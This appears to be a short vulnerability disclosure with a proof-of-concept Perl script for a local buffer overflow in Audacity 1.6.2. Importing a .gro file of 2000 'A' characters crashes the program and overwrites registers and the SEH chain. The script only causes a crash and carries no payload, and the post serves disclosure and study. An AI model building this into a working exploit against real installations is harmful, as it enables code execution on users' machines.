# ----------------------------------------------------------- # Author : Houssamix # ----------------------------------------------------------- # Audacity 1.6.2 (.gro file ) Local buffer overflow POC # download : http://audacity.sourceforge.net/ # Audacity® is free, open source software for recording and editing sounds. # Description: # When we select : project > import midi.. and we import ".gro" file contains long Chars # The Program Will crash and The Following Happen: # EAX:05050504 ECX:01414141 EDX:01520608 EBX:0012F154 # ESP:0012EF10 EBP:00000000 ESI:41414141 EDI:00000000 # EIP:006AEC54 audacity.006AEC54 # Access violation When Reading [41414141] # And Also The Pointer to next SEH record and SE Handler Will gonna BE Over-wrote # Poc : # -------------------------------------------------------- #!/usr/bin/perl #[*] Bug : Audacity 1.6.2 (.gro file ) Local buffer overflow use warnings; use strict; my $chars = "\x41" x 2000 ; my $file="hsmx.gro"; open(my $FILE, ">>$file") or die "Cannot open $file: $!"; print $FILE $chars; close($FILE); print "$file has been created . import it in audacity \n"; # ----------------------------------------------------------